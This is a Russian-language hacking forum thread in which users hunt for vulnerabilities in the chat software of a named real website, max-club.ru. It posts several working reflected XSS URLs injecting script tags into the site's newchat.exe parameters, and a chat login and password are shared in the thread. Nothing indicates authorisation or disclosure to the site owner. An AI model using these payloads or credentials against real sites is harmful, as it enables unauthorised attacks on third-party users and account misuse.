Пипл, помогите определить уязвимости в чате на http://max-club.ru/ используется ПО max!chat исходников нигде не видел, в самом чате все режется блин

Логин и пасс в студию!

а так вообще вот...
_http://www.max-club.ru/cgi/newchat.exe?Get='<script>alert('passive_XSS_by_DRON-ANARCHY')</script>AuthorizedTop&Room=Enter

Да и вообще..времени щас протсо нету....
_http://www.max-club.ru/cgi/newchat.exe?TEST=<script>alert('passive_XXS_by_DRON-ANARCHY')</script>

подробнее мона?

Ну что? Получилось?
Кстати, логин и пасс все-таки выложи...

Логин:antichat
пасс:qwe123
_http://www.max-club.ru/cgi/newchat.exe?Com=Go&Get=Info&Login=<script>alert()</script>&Room=Enter&SID=chat
Набит пассивными ксс

Ну я приблизително это и описал.. там мона и аод Form и под Get и под еще много чего пихать хсс принцип один...